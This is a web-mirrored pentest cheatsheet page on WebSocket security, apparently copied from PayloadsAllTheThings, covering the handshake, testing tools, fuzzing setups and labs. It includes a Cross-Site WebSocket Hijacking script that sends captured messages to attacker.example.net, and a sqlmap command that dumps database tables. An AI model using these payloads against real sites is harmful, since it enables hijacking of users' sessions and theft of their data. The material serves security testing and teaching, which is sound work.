daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (8288B)


      1 ---
      2 title: "Web Sockets"
      3 topic: "Web Sockets"
      4 topicSlug: "web-sockets"
      5 sourcePath: "Web Sockets/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Web%20Sockets/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Web Sockets
     12 
     13 > WebSocket is a communication protocol that provides full-duplex communication channels over a single, long-lived connection. This enables real-time, bi-directional communication between clients (typically web browsers) and servers through a persistent connection. WebSockets are commonly used for web applications that require frequent, low-latency updates, such as live chat applications, online gaming, real-time notifications, and financial trading platforms.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [Web Socket Protocol](#web-socket-protocol)
     20     * [SocketIO](#socketio)
     21     * [Using wsrepl](#using-wsrepl)
     22     * [Using ws-harness.py](#using-ws-harnesspy)
     23 * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
     24 * [Labs](#labs)
     25 * [References](#references)
     26 
     27 ## Tools
     28 
     29 * [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters
     30 * [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
     31 * [PortSwigger/websocket-turbo-intruder](https://github.com/PortSwigger/websocket-turbo-intruder) - Fuzz WebSockets with custom Python code
     32 * [snyk/socketsleuth](https://github.com/snyk/socketsleuth) - Burp Extension to add additional functionality for pentesting websocket based applications
     33 
     34 ## Methodology
     35 
     36 ### Web Socket Protocol
     37 
     38 WebSockets start as a normal `HTTP/1.1` request and then upgrade the connection to use the WebSocket protocol.
     39 
     40 The client sends a specially crafted HTTP request with headers indicating it wants to switch to the WebSocket protocol:
     41 
     42 ```http
     43 GET /chat HTTP/1.1
     44 Host: example.com:80
     45 Upgrade: websocket
     46 Connection: Upgrade
     47 Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
     48 Sec-WebSocket-Version: 13
     49 ```
     50 
     51 Server responds with an `HTTP 101 Switching Protocols` response. If the server accepts the request, it replies like this.
     52 
     53 ```http
     54 HTTP/1.1 101 Switching Protocols
     55 Upgrade: websocket
     56 Connection: Upgrade
     57 Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
     58 ```
     59 
     60 ### SocketIO
     61 
     62 Socket.IO is a JavaScript library (for both client and server) that provides a higher-level abstraction over WebSockets, designed to make real-time communication easier and more reliable across browsers and environments.
     63 
     64 ### Using wsrepl
     65 
     66 `wsrepl`, a tool developed by Doyensec, aims to simplify the auditing of websocket-based apps. It offers an interactive REPL interface that is user-friendly and easy to automate. The tool was developed during an engagement with a client whose web application heavily relied on WebSockets for soft real-time communication.
     67 
     68 wsrepl is designed to provide a balance between an interactive REPL experience and automation. It is built with Python’s TUI framework Textual, and it interoperates with curl’s arguments, making it easy to transition from the Upgrade request in Burp to wsrepl. It also provides full transparency of WebSocket opcodes as per RFC 6455 and has an automatic reconnection feature in case of disconnects.
     69 
     70 ```ps1
     71 pip install wsrepl
     72 wsrepl -u URL -P auth_plugin.py
     73 ```
     74 
     75 Moreover, wsrepl simplifies the process of transitioning into WebSocket automation. Users just need to write a Python plugin. The plugin system is designed to be flexible, allowing users to define hooks that are executed at various stages of the WebSocket lifecycle (init, on_message_sent, on_message_received, ...).
     76 
     77 ```py
     78 from wsrepl import Plugin
     79 from wsrepl.WSMessage import WSMessage
     80 
     81 import json
     82 import requests
     83 
     84 class Demo(Plugin):
     85     def init(self):
     86         token = requests.get("https://example.com/uuid").json()["uuid"]
     87         self.messages = [
     88             json.dumps({
     89                 "auth": "session",
     90                 "sessionId": token
     91             })
     92         ]
     93 
     94     async def on_message_sent(self, message: WSMessage) -> None:
     95         original = message.msg
     96         message.msg = json.dumps({
     97             "type": "message",
     98             "data": {
     99                 "text": original
    100             }
    101         })
    102         message.short = original
    103         message.long = message.msg
    104 
    105     async def on_message_received(self, message: WSMessage) -> None:
    106         original = message.msg
    107         try:
    108             message.short = json.loads(original)["data"]["text"]
    109         except:
    110             message.short = "Error: could not parse message"
    111 
    112         message.long = original
    113 ```
    114 
    115 ### Using ws-harness.py
    116 
    117 Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint.
    118 
    119 ```powershell
    120 python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
    121 ```
    122 
    123 The content of the message should contains the **[FUZZ]** keyword.
    124 
    125 ```json
    126 {
    127     "auth_user":"dGVzda==",
    128     "auth_pass":"[FUZZ]"
    129 }
    130 ```
    131 
    132 Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
    133 
    134 ```python
    135 sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
    136 ```
    137 
    138 ## Cross-Site WebSocket Hijacking (CSWSH)
    139 
    140 If the WebSocket handshake is not correctly protected using a CSRF token or a
    141 nonce, it's possible to use the authenticated WebSocket of a user on an
    142 attacker's controlled site because the cookies are automatically sent by the
    143 browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
    144 
    145 Example exploit, hosted on an attacker's server, that exfiltrates the received
    146 data from the WebSocket to the attacker:
    147 
    148 ```html
    149 <script>
    150   ws = new WebSocket('wss://vulnerable.example.com/messages');
    151   ws.onopen = function start(event) {
    152     ws.send("HELLO");
    153   }
    154   ws.onmessage = function handleReply(event) {
    155     fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
    156   }
    157   ws.send("Some text sent to the server");
    158 </script>
    159 ```
    160 
    161 You have to adjust the code to your exact situation. E.g. if your web
    162 application uses a `Sec-WebSocket-Protocol` header in the handshake request,
    163 you have to add this value as a 2nd parameter to the `WebSocket` function call
    164 in order to add this header.
    165 
    166 ## Labs
    167 
    168 * [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
    169 * [PortSwigger - Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab)
    170 * [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
    171 * [Root Me - Web Socket - 0 protection](https://www.root-me.org/en/Challenges/Web-Client/Web-Socket-0-protection)
    172 
    173 ## References
    174 
    175 * [Cross Site WebSocket Hijacking with socketio - Jimmy Li - August 17, 2020](https://web.archive.org/web/20201031111408/https://blog.jimmyli.us/articles/2020-08/Cross-Site-WebSocket-Hijacking-With-SocketIO)
    176 * [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
    177 * [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://web.archive.org/web/20120920142933/https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
    178 * [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)
    179 * [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://web.archive.org/web/20230718132013/https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
    180 * [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://web.archive.org/web/20190928112120/https://portswigger.net/web-security/websockets)
    181 * [WebSocket Attacks - HackTricks - July 19, 2024](https://web.archive.org/web/20241217220834/https://book.hacktricks.xyz/pentesting-web/websocket-attacks)